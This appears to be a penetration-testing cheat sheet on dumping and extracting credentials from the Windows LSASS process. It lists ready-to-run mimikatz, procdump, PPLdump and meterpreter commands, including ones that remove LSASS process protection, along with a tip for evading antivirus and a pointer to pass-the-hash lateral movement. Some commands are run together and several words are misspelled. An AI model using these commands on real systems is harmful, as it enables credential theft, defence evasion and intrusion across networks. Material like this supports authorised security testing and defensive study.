LSASS
Extract credentials from LSASS
Tools: CrackMapExec/Netexec , lsassy , mimikatz , meterpreter , procdump , PPLDump , GUI
PPLdump64.exe LSASS.EXE|LSASS_PID lsass.dmp
mimikatz "!+" "!processProtect /process:mimikatz.exe" "!processprotect /process:lsass.exe /remove" "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "!processprotect /process:lsass.exe:" "!-" Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz "privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" "exit"load kiwi
creds_allmimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"Mimikatz (Everything)
Mimikatx (Just WDigest)
With LSASS dumped, you can recover NTLM Hashes as well as clertext credentials to do Lateral Movement via Pass-the-Hash or Pass-the-Key
DUMP LSASS PROCESS WITH TASK MANAGER (REQUIRES GUI)
Sysinternals suite (Procdump)
TIP: Bypass AV, write code to encrypt
Mimikatz
BYPASS LSASS PROTECTION
Last updated